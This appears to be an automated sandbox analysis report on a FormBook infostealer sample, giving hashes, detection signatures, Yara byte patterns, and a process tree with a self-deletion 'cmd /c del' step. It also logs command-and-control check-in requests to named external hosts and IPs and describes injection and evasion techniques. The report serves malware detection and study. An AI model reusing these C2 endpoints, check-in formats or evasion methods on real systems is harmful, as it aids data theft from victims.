Analysis Report in.exe

Overview

General Information

Sample Name: in.exe
Analysis ID: 339331
MD5: cc35be28c18578d43849919ac1025d5a
SHA1: 60bcb41d5ef76af919c769fab88f53c6a623a83b
SHA256: 0c9d116a854e274534015e3e8e8349687c0c17b01653723642aeee53aa39bfac
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses netstat to query active network connections and open ports
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • in.exe (PID: 6496 cmdline: 'C:\Users\user\Desktop\in.exe' MD5: CC35BE28C18578D43849919AC1025D5A)
    • in.exe (PID: 6548 cmdline: 'C:\Users\user\Desktop\in.exe' MD5: CC35BE28C18578D43849919AC1025D5A)
      • explorer.exe (PID: 3292 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • NETSTAT.EXE (PID: 6264 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
          • cmd.exe (PID: 5916 cmdline: /c del 'C:\Users\user\Desktop\in.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook


Yara Overview

Memory Dumps

Source: 0000000B.00000002.599420822.0000000000830000.00000004.00000001.sdmp | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 0000000B.00000002.599420822.0000000000830000.00000004.00000001.sdmp | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 0000000B.00000002.599420822.0000000000830000.00000004.00000001.sdmp | Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
  • 0x18419:$sqlite3step: 68 34 1C 7B E1
  • 0x1852c:$sqlite3step: 68 34 1C 7B E1
  • 0x18448:$sqlite3text: 68 38 2A 90 C5
  • 0x1856d:$sqlite3text: 68 38 2A 90 C5
  • 0x1845b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18583:$sqlite3blob: 68 53 D8 7F 8C
Source: 00000002.00000002.292552692.0000000001480000.00000040.00000001.sdmp | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 00000002.00000002.292552692.0000000001480000.00000040.00000001.sdmp | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source: 2.2.in.exe.400000.0.unpack | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 2.2.in.exe.400000.0.unpack | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a6f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b6fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 2.2.in.exe.400000.0.unpack | Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
  • 0x17619:$sqlite3step: 68 34 1C 7B E1
  • 0x1772c:$sqlite3step: 68 34 1C 7B E1
  • 0x17648:$sqlite3text: 68 38 2A 90 C5
  • 0x1776d:$sqlite3text: 68 38 2A 90 C5
  • 0x1765b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x17783:$sqlite3blob: 68 53 D8 7F 8C
Source: 1.2.in.exe.2b50000.2.raw.unpack | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 1.2.in.exe.2b50000.2.raw.unpack | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: in.exe | Avira: detected
Found malware configuration
Source: 2.2.in.exe.400000.0.unpack | Malware Configuration Extractor: FormBook
Multi AV Scanner detection for submitted file
Source: in.exe | Virustotal: Detection: 46%
Yara detected FormBook
Source: Yara match | File source: 0000000B.00000002.599420822.0000000000830000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.292552692.0000000001480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.251301972.0000000002B50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.292256394.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.598393360.0000000000430000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.598703902.0000000000530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.292614037.0000000001600000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 2.2.in.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.in.exe.2b50000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.in.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.in.exe.2b50000.2.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: in.exe | Joe Sandbox ML: detected
Source: 2.2.in.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.in.exe.2b50000.2.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: in.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: in.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: netstat.pdbGCTL | source: in.exe, 00000002.00000002.292671384.0000000001670000.00000040.00000001.sdmp
Source: Binary string: netstat.pdb | source: in.exe, 00000002.00000002.292671384.0000000001670000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP | source: in.exe, 00000001.00000003.250116639.000000001ABB0000.00000004.00000001.sdmp, in.exe, 00000002.00000002.292914452.000000000179F000.00000040.00000001.sdmp, NETSTAT.EXE, 0000000B.00000002.600753548.0000000002D5F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: in.exe, NETSTAT.EXE
Source: C:\Users\user\Desktop\in.exe | Code function: 4x nop then pop edi
Source: C:\Users\user\Desktop\in.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4x nop then pop edi

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49748 -> 198.185.159.144:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49748 -> 198.185.159.144:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49748 -> 198.185.159.144:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49751 -> 199.59.242.153:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49751 -> 199.59.242.153:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49751 -> 199.59.242.153:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49754 -> 94.23.162.163:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49754 -> 94.23.162.163:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49754 -> 94.23.162.163:80
Uses netstat to query active network connections and open ports
Source: unknown | Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: global traffic | HTTP traffic detected: GET /uds2/?Y4spQFW=vIE1ET6pQu49m+QHY7YrZ7t2bRuoKngw2h26Ua5bu/NnC6rxsHDfr4DpunyQx1XamxAZm7X6xg==&Ezu=VTChCL_ht2spUrI HTTP/1.1 | Host: www.seak.xyz | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /uds2/?Y4spQFW=G5yaYpuBg7XYabQFtGr/YwUbUG6Du4hspLJ6ti3LnsVJcslX7oGk4EUBP1FenotTMaF2IKx0Gw==&Ezu=VTChCL_ht2spUrI HTTP/1.1 | Host: www.cptdesignstudio.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /uds2/?Y4spQFW=nX62fi3FGck0KYkDLbl3wNFzysJuwQN4fQs5/MCF0tdU2wk9ctHDwkR8RP5qD5uIs0RtT2NFRQ==&Ezu=VTChCL_ht2spUrI HTTP/1.1 | Host: www.demenageseul.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /uds2/?Y4spQFW=n2X6clJmCA05S3ZeqrcWmU9LgTYh3Xo9IMSlcPg8h+SS+WcZ+1zi1nXkqGc0mRUifak24jBbuw==&Ezu=VTChCL_ht2spUrI HTTP/1.1 | Host: www.concur.design | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 199.59.242.153
Source: Joe Sandbox View | IP Address: 198.185.159.144
Source: Joe Sandbox View | ASN Name: BODIS-NJUS
Source: unknown | DNS traffic detected: queries for: www.seak.xyz
Source: explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000004.00000000.267490258.000000000686B000.00000004.00000001.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: NETSTAT.EXE, 0000000B.00000002.602127128.000000000365F000.00000004.00000001.sdmp | String found in binary or memory: http://www.spontaneoushomeschooler.com/
Source: explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 0000000B.00000002.599420822.0000000000830000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.292552692.0000000001480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.251301972.0000000002B50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.292256394.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.598393360.0000000000430000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.598703902.0000000000530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.292614037.0000000001600000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 2.2.in.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.in.exe.2b50000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.in.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.in.exe.2b50000.2.unpack, type: UNPACKEDPE

System Summary:

          Malicious sample detected (through community Yara rule)Show sources
Source: 0000000B.00000002.599420822.0000000000830000.00000004.00000001.sdmp, type: MEMORY; matched rule: autogenerated rule brought to you by yara-signator; author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.599420822.0000000000830000.00000004.00000001.sdmp, type: MEMORY; matched rule: detect Formbook in memory; author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.292552692.0000000001480000.00000040.00000001.sdmp, type: MEMORY; matched rule: autogenerated rule brought to you by yara-signator; author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.292552692.0000000001480000.00000040.00000001.sdmp, type: MEMORY; matched rule: detect Formbook in memory; author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.251301972.0000000002B50000.00000004.00000001.sdmp, type: MEMORY; matched rule: autogenerated rule brought to you by yara-signator; author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.251301972.0000000002B50000.00000004.00000001.sdmp, type: MEMORY; matched rule: detect Formbook in memory; author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.292256394.0000000000400000.00000040.00000001.sdmp, type: MEMORY; matched rule: autogenerated rule brought to you by yara-signator; author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.292256394.0000000000400000.00000040.00000001.sdmp, type: MEMORY; matched rule: detect Formbook in memory; author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.598393360.0000000000430000.00000040.00000001.sdmp, type: MEMORY; matched rule: autogenerated rule brought to you by yara-signator; author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.598393360.0000000000430000.00000040.00000001.sdmp, type: MEMORY; matched rule: detect Formbook in memory; author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.598703902.0000000000530000.00000040.00000001.sdmp, type: MEMORY; matched rule: autogenerated rule brought to you by yara-signator; author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.598703902.0000000000530000.00000040.00000001.sdmp, type: MEMORY; matched rule: detect Formbook in memory; author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.292614037.0000000001600000.00000040.00000001.sdmp, type: MEMORY; matched rule: autogenerated rule brought to you by yara-signator; author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.292614037.0000000001600000.00000040.00000001.sdmp, type: MEMORY; matched rule: detect Formbook in memory; author: JPCERT/CC Incident Response Group
Source: 2.2.in.exe.400000.0.unpack, type: UNPACKEDPE; matched rule: autogenerated rule brought to you by yara-signator; author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.in.exe.400000.0.unpack, type: UNPACKEDPE; matched rule: detect Formbook in memory; author: JPCERT/CC Incident Response Group
Source: 1.2.in.exe.2b50000.2.raw.unpack, type: UNPACKEDPE; matched rule: autogenerated rule brought to you by yara-signator; author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.in.exe.2b50000.2.raw.unpack, type: UNPACKEDPE; matched rule: detect Formbook in memory; author: JPCERT/CC Incident Response Group
Source: 2.2.in.exe.400000.0.raw.unpack, type: UNPACKEDPE; matched rule: autogenerated rule brought to you by yara-signator; author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.in.exe.400000.0.raw.unpack, type: UNPACKEDPE; matched rule: detect Formbook in memory; author: JPCERT/CC Incident Response Group
Source: 1.2.in.exe.2b50000.2.unpack, type: UNPACKEDPE; matched rule: autogenerated rule brought to you by yara-signator; author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.in.exe.2b50000.2.unpack, type: UNPACKEDPE; matched rule: detect Formbook in memory; author: JPCERT/CC Incident Response Group
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_0041A060 NtClose,
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_0041A110 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_00419F30 NtCreateFile,
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_00419FE0 NtReadFile,
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_00419F82 NtCreateFile,
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_016E9540 NtReadFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_016E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_016E95D0 NtClose,LdrInitializeThunk,
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_016E99A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_016E9860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_016E9840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_016E98F0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_016E9710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_016E97A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_016E9780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_016E9660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_016E9A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_016E9A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_016E9A00 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_016E96E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_016E9560 NtWriteFile,
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_016E9950 NtQueueApcThread,
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_016E9520 NtWaitForSingleObject,
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_016EAD30 NtSetContextThread,
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_016E95F0 NtQueryInformationFile,
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_016E99D0 NtCreateProcessEx,
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_016EB040 NtSuspendThread,
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_016E9820 NtEnumerateKey,
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_016E98A0 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_016E9760 NtOpenProcess,
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_016E9770 NtSetInformationFile,
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_016EA770 NtOpenThread,
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_016E9730 NtQueryVirtualMemory,
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_016E9B00 NtSetValueKey,
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_016EA710 NtOpenProcessToken,
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_016E9FE0 NtCreateMutant,
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_016EA3B0 NtGetContextThread,
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_016E9670 NtQueryInformationProcess,
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_016E9650 NtQueryValueKey,
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_016E9610 NtEnumerateValueKey,
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_016E9A10 NtQuerySection,
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_016E96D0 NtCreateKey,
Source: C:\Users\user\Desktop\in.exe; Code function: 2_2_016E9A80 NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_02CA96D0 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_02CA96E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_02CA9650 NtQueryValueKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_02CA9A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_02CA9660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_02CA9FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_02CA9780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_02CA9710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_02CA9840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_02CA9860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_02CA95D0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_02CA99A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_02CA9540 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_02CA9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_02CA9A80 NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_02CA9670 NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_02CA9A00 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_02CA9610 NtEnumerateValueKey,
Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_02CA9A10 NtQuerySection,
